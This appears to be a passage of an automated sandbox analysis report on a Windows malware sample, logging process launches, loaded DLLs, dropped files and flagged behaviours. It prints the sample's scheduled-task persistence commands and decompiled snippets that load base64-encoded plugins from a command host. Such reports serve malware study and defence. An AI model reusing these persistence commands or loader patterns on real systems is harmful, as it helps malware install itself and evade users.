Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m" Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: DA92phBHUS.exe Static file information: File size 3145765 > 1048576
Source: DA92phBHUS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.1.raw.unpack, Messages.cs .Net Code: Memory
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 10.3.Dump.pif.151caa0.0.raw.unpack, Messages.cs .Net Code: Memory
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
PE file contains an invalid checksum
Source: DA92phBHUS.exe Static PE information: real checksum: 0xc6020 should be: 0x3088dd
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E68B75 push ecx; ret 10_2_00E68B88
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00318B75 push ecx; ret 18_2_00318B88
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030CBDB push eax; retf 18_2_0030CBF8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0030CC06 push eax; retf 18_2_0030CBF8

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif File created: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EC59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 10_2_00EC59B3
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E55EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_00E55EDA
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_003759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 18_2_003759B3
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00305EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 18_2_00305EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E633B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_00E633B7
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DA92phBHUS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
